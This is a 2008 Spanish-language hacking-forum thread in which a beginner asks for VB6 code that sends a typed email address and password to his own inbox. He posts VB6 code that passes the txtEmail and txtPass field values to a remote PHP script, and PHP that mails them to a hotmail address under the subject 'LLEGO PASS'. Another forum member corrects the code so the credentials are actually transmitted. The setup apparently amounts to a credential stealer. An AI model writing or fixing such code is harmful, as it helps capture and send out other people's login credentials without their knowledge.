ENVIAR EMAIL CON USER Y PASS

Iniciado por jeri82, 8 Noviembre 2008, 05:46 AM

0 Miembros y 1 Visitante están viendo este tema.

jeri82

Hola a todos....
Soy nuevo usuario....
Necesito urgente un codigo de enviar a email con user y pass de vb 6 porque estoy haciendo un programa pero me falto unico codigo pero yo no se cual es codigo ademas yo he buscado en internet y ya he encontrado no entiendo nada los tutoriales, si alguien que me quiere dar codigo y me explic lo que es.... muchas gracias.

espero que me ayudara ^^

krackwar

Dos cosas leete las reglas no se pueden postear mails y este tema se a hablado 100 veces por lo menos asi que ponte a buscar  >:(.

Saludos
krackwar
Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.

jeri82

sorry no sabia porque no he leido las reglas xD
disculpame

& eDu &

Leete este código que publiqué

http://foro.elhacker.net/programacion_vb/tutorial_enviando_email_con_vb6-t230043.0.html

Antes de ponerlo a tu programa entiende lo que hace el codigo.

jeri82

Mira.... yo he leido este codigo que me mandaste pero no funciona llego email porque me sale error mensaje Run-time '424"
yo le puse codigo sale


Private Sub Command1_Click()
ws.Navigate ("www.plusordos.net/prueba/envio.php" & "?value=" & "txtEmail, txtPass")
End Sub

y ya he subido codigo de php es

<?php
$val = $_GET['value'];
mail ('jeri.lolita@hotmail.com', 'LLEGO PASS', $val);
?>

que raro no he llegado email nada

igual te doy muchas gracias por me mandaste link :)

& eDu &

#5
El problema es este

Código (vb) [Seleccionar]
Private Sub Command1_Click()
ws.Navigate ("www.plusordos.net/prueba/envio.php?value=" & txtEmail.Text & " Password " & txtPass.Text)
End Sub

No puedes poner el contenido de un objeto entre comillas, ahora debería funcionar

jeri82

lo voy a probar, espero que funciona ^^ muchas gracias  :D

jeri82

ya probe no funciona llego email pero yo copie y pegue me mandaste tu codigo que raro no llego email pero todo textbox muy bien sabes porque yo lo puse textbox de email es txtEmail y pass es txtPass que raro no llego email nada :(



Private Sub Command1_Click()
ws.Navigate ("www.plusordos.net/prueba/envio.php?value=" & txtEmail.Text & " Password " & txtPass.Text)
End Sub

& eDu &

Cita de: jeri82 en  8 Noviembre 2008, 12:05 PM
ya probe no funciona llego email pero yo copie y pegue me mandaste tu codigo que raro no llego email pero todo textbox muy bien sabes porque yo lo puse textbox de email es txtEmail y pass es txtPass que raro no llego email nada :(



Private Sub Command1_Click()
ws.Navigate ("www.plusordos.net/prueba/envio.php?value=" & txtEmail.Text & " Password " & txtPass.Text)
End Sub

Entra aqui y dime si te llega el email ->> www.plusordos.net/prueba/envio.php?value=Olanana

jeri82

disculpa ya llego email un poco demora pero no sale nada email y pass en email esta vacio jejejeje no se porque pero yo ya le puse email y pass en programa